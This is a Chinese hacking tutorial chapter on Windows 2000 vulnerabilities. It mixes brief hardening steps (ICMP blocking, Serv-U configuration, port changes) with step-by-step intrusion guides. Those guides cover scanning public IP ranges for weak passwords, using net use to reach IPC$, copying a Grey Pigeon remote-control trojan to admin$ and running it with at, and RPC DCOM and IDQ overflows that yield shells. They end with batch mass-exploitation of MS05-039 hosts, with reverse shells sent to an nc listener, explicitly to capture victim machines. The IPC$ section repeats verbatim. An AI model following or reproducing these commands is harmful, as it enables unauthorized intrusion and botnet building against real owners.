【文章摘要】黑客入侵用户电脑,大多原因都是系统漏洞没有及时修补,才造成了恶意人有机可乘的“后果”。为了让大家能够更好的防御自己的电脑,笔者将会在本章详细讲解关于系统漏洞的攻防方法,让其读者在体验攻击的快感同时,还能更好的防御自己的电脑。
利用系统自身的缺陷,进行各种入侵向来就是黑客常得手的重要途径,特别是对于防范意识较差的用户来说更容易让黑客得手。如果你是一位了解计算机网络知识的读者,想必一定知道Ping命令,是网管们常常用来检查网络是否畅通的命令,可是这个命令也能给Windows系统带来严重的后果,那就是Ping入侵即ICMP攻击。本文以Windows 2000操作系统为例,利用其自身的IP策略来阻止ICMP攻击。这里首先依次单击“开始”→“运行”选项,在弹出的“运行“对话框内,输入“MMC”命令回车,此时就会弹出“控制台”对话框(图1)。
图1 弹出控制台对话框
然后我们单击“控制台”标签,选择里面“添加/删除管理单元”选项,从中我们添加一个“IP安全策略管理”规则到控制台(图2)。
图2 选择IP安全策略管理选项
接下来如果你想创建IP安全策略,请在“控制台”对话框内,右击所添加的“IP安全策略管理”标签,选择里面“创建IP安全策略”选项,这样就可进入到创建IP安全策略规则的向导对话框内(图3)(图4)。
图3 创建IP安全策略
图4 进入到IP安全策略向导对话框这里在“名称”标签的文本处,输入“ping”字母后,一路单击“下一步”按钮,到“默认响应规则身份验证方式”界面,从中选择“此字串用来保护密钥交换(预共享密钥)”的单选框后,在其文本处输入“123”数字,这样其安全规则身份验证方式,就会以字串来保护密钥交换了,而后单击“下一步”按钮直到完成结束(图5)。
图5 选择此字串用来保护密钥交换(预共享密钥)的单选框
操作完毕后,在以上所创建的“Ping属性”对话框内,单击“添加”按钮,在弹出的“安全规则”向导对话框里,继续一路单击“下一步”按钮到“身份验证方法”界面,从中再次选中“此字串用来保护密钥交换(预共享密钥)”的单选框,并且在其文本处输入“123”数字,单击“下一步”按钮,就可进入到“IP筛选器列表”界面(图6)。
图6 进入到IP筛选器界面
单击“添加”按钮,在弹出的“IP筛选器列表”对话框内,将名称更改成ping后,再次单击“添加”按钮,此时在所弹出的“筛选器向导”对话框内,一路单击“下一步”按钮到“IP协议类型”界面,将选择协议类型设置为你想要阻挡的“ICMP”攻击协议(图7)。
图7 选择ICMP协议列表而后继续单击“下一步”按钮直到完成,顺原路返回到“IP筛选器列表”对话框,然后开始开始设置防御ICMP攻击的策略,这里再次单击“添加”按钮,在弹出的“安全规则向导”对话框内,选择“Ping”单选框后,单击“下一步”按钮,在“筛选器操作”界面内,选中“要求安全设置”的单选框(图8)。
图8 选中要求安全设置单选框
接下来单击“下一步”按钮,去掉“编辑属性”复选框上的勾后,单击“完成”按钮,即可将ICMP的防御策略设置成功,最后我们还需指派设置好的ICMP防御策略(图9)。
图9 指派ping策略
这里在“控制台”对话框内,右击其创建成功的ping策略,选择“指派”选项,使其ICMP防御策略应用,从而本机以后就可具备防止ICMP数据包攻击的功能了。7.1.2系统漏洞扫描器的使用操作
如果我们将电脑比作一个大楼,那么主机入侵信息收集及分析,就如同大楼中部署若干个摄像头,在大楼发生盗窃事件之后,对摄像头中的影像进行分析,进而为报案和“亡羊补牢”做准备。因此扫描工具及其技能,是黑客们及其网管必备的工具,及必须掌握的攻防方法之一。
稳定性极强的流光扫描器
以下笔者将会针对网络上最常用的流光、X-SCAN扫描工具,做以详细的讲解。首先是流光扫描软件,它是国内最早的专业扫描软件,其功能强大、扫描速度快、可靠性强的三个特点,深受广大黑迷的喜爱。这里打开“流光”扫描界面,印入眼帘的是左侧扫描主界面, 如果你想对某主机进行扫描的话,请在相关的目标主机类型处,进行添加想要扫描的目标,例如这里想对http主机进行扫描(图10)。
图10 添加想要扫描的Http主机
我们在目标主机的Http主机上方右击,依次选择“编辑”→“添加”选项,在弹出的“添加主机(Http)”对话框内,输入想要检测主机的域名地址,例如在其文本处输入www.hacker.com.cn后,单击“确定”按钮,便可将其添加的主机地址载入到扫描界面内(图11)(图12)。
图11 添加Http主机
图12 将想要扫描的主机载入到界面然后从中将载入的主机,以及Http主机的栏勾选上后,右击载入想要检测的主机,在弹出的快捷菜单内,单击“探测”选项,可以选择对主机开放的端口进行检测,还是对主机类型,以及其用户信息进行扫描,这里以检测主机开放端口为例,选择“扫描主机端口”选项,此时就会弹出“端口探测设置”对话框,从中设置好想要探测开放端口的范围(图13)。
图13 设置想要扫描的端口范围
设置完毕后,单击“确定”按钮,此时就会立即对其主机进行端口扫描,稍等片刻后,便可弹出“扫描结果”给予用户提示(图14)。
图14 正在对主机进行端口扫描
图15 探测到所开放的系统端口从以上图中,我们得知目标主机开放了80和21端口,了解了这一切后,单击“确定”按钮将其关闭。接下来如果你不满足仅仅只对端口进行检测,还想对主机进行综合扫描的话,请依次单击上方“探测”→“高级扫描工具”选项,此时就会弹出“高级扫描设置”的对话框(图16)。
图16 打开高级扫描设置对话框
在“高级扫描设置”对话框内,可以设置对一个IP段进行扫描检测,不过这里要注意的是扫描的主机数量,最好不要超过35台主机。然后在下面“检测项目”栏内,去掉一些不需要扫描的项目前的勾,以节省我们扫描检测的时间,最后单击“确定”按钮,便可按照设置对其IP段进行相关检测了。功能强大的Xscan扫描工具
大名鼎鼎的Xscan工具,是即流光之后的第二款著名扫描工具,其Xscan工具特点,不仅继承了流光超强的稳定性,而且它还支持多重系统漏洞的扫描,扩展性极强是一款非常不错的检测工具。
打开“Xscan”扫描界面,从中单击上方“扫描参数”按钮,在弹出的“扫描参数”对话框内,将指定IP范围内,输入想要扫描的目标主机IP,或者是域名地址(图17)。
图17 输入想要扫描域名地址
然后依次选择左侧“全局设置”→“扫描模块”选项,在其右侧勾选想要扫描的“项目”复选框(图18)。
图18 勾选上想要扫描的项目复选框
其他选项保持默认设置后,单击“确定”按钮,就可将想要扫描的目标锁定了,然后单击界面里的“开始扫描”按钮,此时就可根据我们之前设置的扫描项目,进行逐一检测了(图19)。
图19 正在对锁定的目标主机进行检测
其结果会显示在右下方栏内,如果此时你已经找到了自己想要的信息,可以单击“暂停扫描”或者“终止扫描”按钮,停止以下的相关项目扫描,从而为自己节省一些检测时间。7.1.3IPC$漏洞入侵
IPC$漏洞入侵,已经成为网络黑客入侵系统的经典模式,尽管WindowsXP和Windows2003对于IPC的连接进行了极好的改进,但是Windows 2000系统一般架设的都是服务器,所以为了传输方便,管理员不会对其IPC做任何限制,因此IPC$漏洞的入侵得手率还是很高,这里笔者将会针对IPC$漏洞,其入侵方法做以详细讲解。
小提示:IPC是Internet Process Connection的缩写,IPC$是共享“命名管道”的资源,它对于程序间的通信很重要,一般网管在远程管理和查看计算机的共享资源时,会经常通过此服务来进行查看。
由于网上不是每台主机都会存在IPC,以及NT空口令漏洞,所以这里我们需要打开“Xscan”扫描界面,单击“扫描参数”按钮,在弹出“扫描参数”对话框内,默认选择的是左侧“检测范围”标签,我们在其右侧输入想要检测的IP段(图20)。
图20 输入想要检测的IP段
操作完毕后,依次选择左侧“全局设置”→“扫描模块”选项,而后在其右侧勾选“NT-Server弱口令”前复选框后,单击“确定”按钮使其设置生效(图21)。
图21 勾选NT-Server弱口令和Netbios信息前的复选框
接着会顺“原路”返回到软件界面,从中单击“开始扫描”按钮,此时便可对设置的IP段进行扫描。稍等片刻,就会在扫描软件的同一目录下,生成扫描结果的Html页面,我们将其打开后,其安全漏洞栏就会显示出其系统存在的漏洞(图22)。
图22 显示出所检测到的系统漏洞
从以上图内,可以看到漏洞栏里的端口/服务是Netbios-ss,其实这个就是IPC$共享服务漏洞,而其后面所显示的口令,则是检测到其主机的管理员口令和密码。现在已万事俱备,只欠东风的时候,而其东风就是我们入侵主机的操作。7.1.3IPC$漏洞入侵
IPC$漏洞入侵,已经成为网络黑客入侵系统的经典模式,尽管WindowsXP和Windows2003对于IPC的连接进行了极好的改进,但是Windows 2000系统一般架设的都是服务器,所以为了传输方便,管理员不会对其IPC做任何限制,因此IPC$漏洞的入侵得手率还是很高,这里笔者将会针对IPC$漏洞,其入侵方法做以详细讲解。
小提示:IPC是Internet Process Connection的缩写,IPC$是共享“命名管道”的资源,它对于程序间的通信很重要,一般网管在远程管理和查看计算机的共享资源时,会经常通过此服务来进行查看。
由于网上不是每台主机都会存在IPC,以及NT空口令漏洞,所以这里我们需要打开“Xscan”扫描界面,单击“扫描参数”按钮,在弹出“扫描参数”对话框内,默认选择的是左侧“检测范围”标签,我们在其右侧输入想要检测的IP段(图20)。
图20 输入想要检测的IP段
操作完毕后,依次选择左侧“全局设置”→“扫描模块”选项,而后在其右侧勾选“NT-Server弱口令”前复选框后,单击“确定”按钮使其设置生效(图21)。
图21 勾选NT-Server弱口令和Netbios信息前的复选框
接着会顺“原路”返回到软件界面,从中单击“开始扫描”按钮,此时便可对设置的IP段进行扫描。稍等片刻,就会在扫描软件的同一目录下,生成扫描结果的Html页面,我们将其打开后,其安全漏洞栏就会显示出其系统存在的漏洞(图22)。
图22 显示出所检测到的系统漏洞
从以上图内,可以看到漏洞栏里的端口/服务是Netbios-ss,其实这个就是IPC$共享服务漏洞,而其后面所显示的口令,则是检测到其主机的管理员口令和密码。现在已万事俱备,只欠东风的时候,而其东风就是我们入侵主机的操作。不过在入侵之前,我们需要配置好自己的后台木马,以便自己下次无需入侵,就可直接遥控主机。这里以灰鸽子木马为例,打开“灰鸽子客户端”界面,单击上方“配置服务程序”按钮,在弹出的“服务器配置”对话框内,默认切入的是“自动上线设置”标签,我们在其下方“IP通知Http访问地址、DNS解析域名或固定IP”内,将自己本机IP填入(图23)。
图23 填入本机固定的IP地址
其他设置保持默认即可,而后单击“生成服务器”按钮,并且选择生成路径,便可立即成功生成灰鸽子服务端程序。这里笔者为了便于大家的记忆,将其生成好的服务端程序名称更改成11.exe,然后依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“CMD”命令回车,此时便可弹出“CMD命令提示”对话框(图24)。
图24 打开系统自带的CMD命令窗口
接着在光标闪烁处,输入“cd ”命令回车,将当前目录切换到C盘根目录下,而后输入net use z.16.210.240(目标主机IP地址)ipc$ “123(目标主机上的管理员密码)” /user:“administrator(管理员账号)”回车,便可与目标主机成功建立空连接(图25)。
图25 与目标主机建立空连接
而后在光标闪烁的位置处,输入“net user”命令回车,查看一下目标主机当前的用户列表(图26)。
图26 查看远程目标主机用户列表可以从界面内,清楚的看见里面有个OK的用户,同时也证明了我们所拥有的权限是管理员权限。接下来在光标闪烁的位置处,输入“Copy C:11.exe(本机配置的后门木马) z.16.210.240admin$”命令回车,此时就会将本机木马11.exe上传到目标主机的admin共享目录下(图27)。
小提示:一般目标主机都会开放admin的共享目录,所以我们通常只要将木马上传到受害主机的admin目录内即可。当然如果管理员处于防范的心理,将admin目录关闭,而开放其他目录,你可以通过“net view 目标IP”的命令,来查看对方共享。
图27 将本机后门木马上传到目标主机的admin目录内
接下来为了使木马运行,我们需要定制计划任务让其上传的木马运行,不过由于目标主机的当前系统时间我们不知道的因素,所以这里需在光标闪烁处,输入“net time z.16.21.240”命令,查看一下当前目标主机的系统时间(图28)。
图28 查看目标主机的当前时间
查看到目标主机当前的系统时间,为下午09:14,那么我们定制的计划木马运行时间,就要比其目标系统主机时间晚几分钟,甚至时间更长。这里在光标闪烁的位置处,输入“at z.16.210.240 21:17 11.exe”的执行命令回车,这样上传到目标主机的11.exe木马就会在当天的下午9点17分运行,换句话说过两分钟运行木马(图29)。
图29 设定计划任务使其上传的木马运行
两分钟过后,灰鸽子木马果然自动运行了,此时笔者查看了一下灰鸽子客户端程序,发现多出了一台肉鸡,其所显示的IP地址正是刚刚入侵的172.16.210.240,这样我们以后想操控其肉鸡时,无需再对其进行入侵,便可通过灰鸽子直接遥控了。7.1.4 Serv-U究极安全配置
众所周知,Serv-U FTP Server 是构建自己强力FTP服务器的一种软件,它能够帮助网管以最快的速度架设FTP服务器。也许是树大招风的原因,随着Serv-U FTP Server软件使用人数逐步增多的因素,黑客将攻击目标锁定到了该软件身上,使其频频告急并不断涌现出,一些能够致命的漏洞。因此笔者为了正在使用或者想用该软件网管的着想,特此写下Serv-U究极防御的安全配置篇,来防止黑客肆无忌惮的入侵。
Serv-U FTP Server软件的安装过程
首先是安装Serv-U FTP Server软件,这里笔者建议使用v6以上版本,这样可以自动减去一些底版本的致命漏洞。在网上下载完Serv-U FTP Server软件后,双击其安装程序,在弹出的“安装向导”对话框内(图30)。
图30 弹出安装Serv-U FTP Server软件向导
勾选编辑“I have checked my Mcafee……”前的复选框,单击“Next(下一步)”按钮,进入到安装路径界面,其软件默认安装到C:ProgramFilesServ-U目录下,这个 默认安装目录想必黑客也应该知道,所以我们单击“Browse(浏览)”按钮,在弹出“select Destination Directory”对话框内,将安装目录进行选择更改,更改的越复杂越好,然后单击“Ok”按钮确认(图31)。
图31 选择好安装路径
看看够复杂了吧,而后单击“Next(下一步)”按钮,在其界面内只勾选前两项复选框,来减少一些不必要的插件进行加载(图32)。
图32 只勾选前两个复选框选项接下来继续单击“Next(下一步)”按钮,在上方文本处将默认的Serv-U FTP Server,改成任意的字母词汇,这样其开始菜单组里的文件夹名字,也会发生相应的变化(图33)。
图33 更改上方默认的Serv-U FTP Server文本
操作完毕后,一路单击“Next(下一步)”按钮,便可对其默认的Serv-U FTP Server软件进行安装,当安装完成后,它会出现一个向导让你建立一个域和账号(图34)。
图34 要求建立一个域和账号
这里单击“Cancel”按钮取消向导,而后在将桌面和开始菜单上,生成的该程序快捷方式删除。由于该软件是英文版的,所以网管在观看时会有障碍,这里请在Serv-U目录内,运行“汉化补丁”程序,此时就会弹出“汉化向导”对话框(图35)。
图35 弹出汉化向导对话框
从中单击“下一步”按钮,进入到“选择目标位置”界面,这里我们单击“浏览”按钮,将其定位到Serv-U FTP Server软件的安装目录(图36)。
图36 将其位置定位到Serv-U FTP Server软件的安装目录
而后便可一路单击“下一步”按钮,直接安装完相关的汉化插件结束。
小提示:如果你下载的Serv-U软件包,并没有附带该汉化程序,你可以自行去网上下载其汉化包即可。教你安全设置Serv-U FTP Server软件
虽然以上我们在安装Serv-U FTP Server软件时,做了简单的安全配置,但是面对来势凶猛的黑客,这些防御只是微不足道的,所以我们需在Serv-U FTP Server软件设置上下“功夫”。
这里打开“Serv-U FTP Server软件”界面,如果此时你想对软件密码进行设置,请依次选择左侧“Serv-U服务器”→“<<本地服务器>>”选项,然后在右侧勾选“自动开始”复选框后,单击“设置/更改密码”按钮,在弹出“设置或更改管理员密码”对话框内,就可为其设置一个复杂的管理员密码(图37)。
图37 设置管理员密码
由于笔者之前没有对Serv-U设置密码,所以原来的密码就为空,然后在其下方输入自己想要设置的密码,单击“确定”按钮,便可使其设置的密码生效。另外为了安全起见,我们还需为Serv-U建立一个单独的管理账号,这里在桌面依次单击“开始”→“管理工具”→“Internet服务管理器”选项,在弹出的“计算机管理”对话框内,依次展开左侧到“计算机管理”→“本地用户和组”→“用户”选项处,从中新建立一个名为hack6用户,切记其密码一定要复杂免得被他人破解(图38)。
图38 建立管理员账号
然后勾选“用户不能更改密码”和“密码永不过期”前的复选框后,单击“创建”按钮,便可立即创建一个名为hack6的用户。接着在“计算机管理”对话框,右侧找到并且右击该用户,选择“属性”选项(图39)。
图39 右击刚刚创建的hack6用户此时就会弹出“hack6属性”对话框,从中切入至上方“隶属于”标签,选择里面的“Users”用户组,单击“删除”按钮,在点击“确定”使其生效便可(图40)。
图40 选择Users用组将其删除
这样hack6账号就已经创建完毕了,不过要想将其应用到Serv-U服务器内,我们在桌面依次单击“开始”→“管理工具”→“服务”选项,在弹出的“服务”对话框内,找到并且双击“Serv-U FTP 服务器”名称,此时就会弹出“Serv-U FTP 服务器的属性”对话框(图41)。
图41 弹出Serv-U FTP 服务器的属性对话框
从中切入至上方“登录”标签,选中下方“此账号”的单选框,单击“浏览”按钮,在弹出的“选择用户”对话框内,选择刚才建立的“hack6”用户,单击“确定”按钮,就可将其载入到此账户文本内,接着在其密码处输入相关密码,单击“确定”按钮完成服务设置(图42)。
图42 将刚才建立的账号hack6加载到Serv-U FTP 服务器内
接下来打开“运行”对话框,在其文本内输入“regedit32”命令回车,便可打开“注册表编辑器”对话框。然后将其左侧组件依次展开到“HKEY_LOCAL_MACHINESOFTWARECat Soft”分支下,并将其分支选中(图43)。
图43 将组件展开到Cat Soft分支下接着单击上方“安全”菜单,选择里面的“权限”选项,这时就会弹出“Cat Soft的权限”对话框,我们将其里面的用户名称全部删除,在单击“添加”按钮,将刚才建立的hack6添加进来,而后勾选其允许栏里的“读取”、“完全控制”选项,并单击“确定”按钮,让其拥有足够的权限来进行管理(图44)。
图44 添加Hack6用户
除此之外,安装目录的权限也需要仔细设置,以免恶意人通过其他用户进行访问。由于笔者将Serv-U FTP Server安装到D盘,所以这里我们进入盘符为D盘,而后从中找到并且右击Serv-U FTP Server安装目录,选择“属性”选项,在弹出的“属性”对话框内,切入至“安全”标签(图45)。
图45 弹出安装目录的属性对话框
我们将里面System用户删除,以防止黑客通过这个系统超级用户来访问安装目录,进行肆意破坏。等到删除完毕后,单击“添加”按钮,从中找到并加入的hack6用户,然后给予其用户除完全控制外的所有权限,单击“确定”按钮使其设置生效(图46)。
图46 给安装目录加入hack6用户
这样黑客在不知道hack6用户密码时,要想从安装目录里找到想要的重要数据是不可能的,不过为了防止恶意人通过FTP用户进行做乱,我们需要对其内部用户进行权限设置,笔者这里的FTP服务器路径是e:web,那么我们就在E盘根目录处,找到并且右击“web”文件夹,选择“属性”选项,在弹出的“属性”对话框内,切入至上方“安全”标签(图47)。
图47 切入至安全标签查看用户 黑客除了针对3389端口扫描外,还会针对一些其他危险的端口进行检测,以下笔者将会针对一些比较常见的危险端口做一下修改。这里假设你架设了FTP服务器,其系统就会默认开放21端口,与其网络进行文件传输。因此黑客一旦嗅觉其端口的存在,它就会想法设法针对FTP展开猛烈攻击,所以为了隐藏FTP服务的存在,我可以将端口进行更改。 这里依次双击“控制面板”→“管理工具”→“Internet信息服务”选项,在弹出的“Internet信息服务”对话框内(图60)。
图60 打开Internet信息服务对话框
右击左侧“默认FTP站点”标签,选择“属性”选项,此时就会弹出“FTP站点属性”对话框,默认切入至上方“FTP站点”标签(图61)。
图61 弹出的FTP站点属性对话框
如果你要想修改FTP通讯的21端口,只要在其对话框内,将TCP端口里的21数字,更改成你想要的FTP通讯端口数便可。除此之外WEB站点的80端口,也可同样做相关修改,这里右击左侧“默认Web站点”标签,选择“属性”选项,在弹出的“默认Web站点属性”对话框内,只要将里面的TCP文本80端口,更改成你想要的端口后,单击“确定”按钮,便可同样将其WEB站点的通讯端口进行更改(图62)。
图62 弹出的默认Web站点属性对话框
其他服务的修改端口方法均大同小异,这里就不做过多讲解了。如果你使用的FTP不是系统自带的工具,而是FTP服务的Serv-u管理软件,可在其界面左侧依次展开“Serv-u服务器”→“本地服务器”→“域”选项,然后选中自己新建的FTP服务器(图63)。
图63 选中自己建立的FTP服务器
在右侧将FTP端口号里的21,更改成自己的想要通讯的FTP端口,即可单击下面“应用”按钮,使其更改的端口号生效。在经过对以上危险的端口修改后,相信黑客在对主机扫描时,将无法得到任何有价值的信息,即使得到我们所更改的端口号,它也无从分辨此端口开放代表系统哪个服务,所以攻击也就无法实施了。7.1.6RPC DCOM溢出漏洞攻击Remote Procedure Call (RPC)是Windows操作系统使用的一种远程调用协议,并且它提供了进程间交互通信机制,允许在某台计算机上运行程序,且在远程系统上执行相关代码。但是在提供方便的同时,RPC在处理畸形消息时却存在问题,远程攻击者可以利用这个漏洞进行拒绝服务攻击,从而等到系统崩溃后将自己权限进行提升,来控制其受害主机。
一般开放135端口的主机,几乎都会有该漏洞的存在,因此这里我为了确定攻击的目标,笔者拿出“Superscan”扫描工具,在其IP的起与结束处输入想要扫描的IP段,然后勾选“端口范围”单选框,并且在其后面输入135,单击“开始扫描”按钮后,即可进行检测(图64)。
图64 检测到所开放的135主机
稍等片刻后,就会检测到很多台开放135端口的主机,我们从中随便挑选一台,进行溢出攻击便可。这里扫到的218.0.173.5的主机IP地址为例,打开“运行”对话框,在其文本内输入“CMD”命令回车,此时就会打开“命令提示”对话框(图65)。
图65 打开命令提示对话框
我们将其默认的C盘目录,跳转并且进入到RPC溢出工具所在目录,然后在光标闪烁处输入“Dcomrpc 1 218.0.173.5”命令后回车,如果溢出成功,此时的目录就会自动跳转到System32下(图66)。
图66 溢出成功后得到受害主机的Shell
这样我们就已经拥有了对方的Shell,而且其身份还是管理员权限,可以任由我们自己在其后台上,做修改、删除文件等操作。7.1.7 Idq漏洞攻击教程
风光了很久的Idq漏洞是经常被入侵者利用的漏洞之一,记得在中美黑客大战中,黑客们普遍利用该漏洞,入侵到对方的主机实施攻击。如今这种经典的漏洞,掐指一算“风头”已经过去5年了,不过笔者发现还是有很多主机存在该危险漏洞,以下就是关于其漏洞的入侵方法。
由于你可能不知道某台主机是否存在Idq漏洞,我们可以利用Xsan或者流光扫描器,对其
主机做/null.idq检测,如果发现有此结果出现,就代表它存在Idq漏洞。关于Xsan或者流光扫描器的使用,已经在前几节介绍过了,因此就不多加讲解了,这里笔者已经扫描到了一个存在Idq漏洞的主机。
于是打开Snake IIS溢出工具,在其界面的被攻击地址处,输入存在Idq漏洞IP地址,其后面端口为80,然后根据情况在“操作系统类型”列表内,选择与受害主机相对应的系统,并选中“右侧溢出后,在一个端口监听”的单选框后,从中输入想要监听的端口(图67)。
图67 对目标主机实施溢出
当shellcode发送成功后,我依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“Telnet 202.39.49.23(溢出目标主机的IP) 813(监听端口)”命令后回车。如果成功稍等片刻后,就会Telnet到对方主机的Shell平台(图68)。
图68 成功登陆到对方主机的shell平台
小提示: Telnet服务是本地计算机与远程计算机,进行连接通讯的一种终端服务,用户通过本地计算机登陆到远程计算机后,所拥有的身份为系统管理员权限。
利用Telnet命令登录到目标主机后,此时的你已经可以为所欲为的对其主机进行控制,比如做删除文件、修改文件、上传下载木马等操作,可见Idq漏洞一旦溢出成功,后果真实不堪设想。7.1.8批量溢出Ms05039漏洞主机
肉鸡是黑客新手成长的一个练手平台,但是对于刚接触黑客的新手来说,要想抓取肉鸡并非容易,一般他们都是通过找师傅给肉鸡的途径才能获取。那么难道黑客新手,真的只能通过师傅施舍肉鸡来获取吗?答案当然不是,以下笔者针对初级黑客量身订做了一套抓取肉鸡的方法,具体操作请看下文所示。
俗话说的好:“工欲善其事,必先利其器”,首先我们在操作之前,需要从网上下载s.exe扫描器和nc瑞士军刀监听、Ms05039漏洞溢出工具,然后在命令行下,将默认目录跳转到下载的s.exe扫描器目录处。
由于我们不知道哪台主机存在Ms05039漏洞,所以这里从中输入s tcp 218.1.0.0 218.1.128.255 445(端口) 120(线程,可以根据网络好坏调整大小) /save命令回车,便可对其218.1.0.0--218.1.128.255段的主机进行扫描,如果你想扫描其他主机段,只要将其IP段进行替换,其他保持原样即可。稍等片刻后,扫描结果会生成在S扫描器目录下的Result.txt内(图69)。
图69 扫描结果显示
小提示:以上命令参数Tcp,为本次扫描的方式是Tcp形式。而后其面的218.1.0.0 218.1.128.255为扫描的IP段,445为扫描端口,120为线程这个可以根据自己实际网速来定。
接下来打开“CMD命令”对话框,如果此时的目录并非Nc工具所在的目录,请将其默认目录跳转到NC工具目录下。然后从中输入“nc -l -vv –p 想要监听的端口”命令回车,对其本地某端口执行监听。当然你也可以像笔者一样,在一个Bat的批处理文件中,输入监听命令,然后执行其Bat批处理文件,同样可以达到监听本机端口的效果(图70)。
图70 利用Nc瑞士军刀对本机1984端口进行监听
执行完以上监听后,为了方便自己的溢出,笔者在存有S扫描工具、Ms05039漏洞目录内,新建了一个记事本文档,然后在其文档内部,输入如下溢出命令:@for /f %%i in (result.txt) do ms05039 %%i 219.128.81.93 1984,接着将其保存为.Bat形式的批处理文件即可。操作完毕后,另外打开一个“CMD命令”窗口,从中运行其批处理文件,此时就可对其所扫到445主机,进行批量溢出,从而得到Shell,自行做上传木马、建立用户等任意操作(图71)。
图71 自动对result.txt文本内的主机进行批量溢出
小提示:result.txt是我们之前所扫描到可用漏洞的主机群体,219.128.81.93则是自己的IP地址,1984是本机所监听的端口号。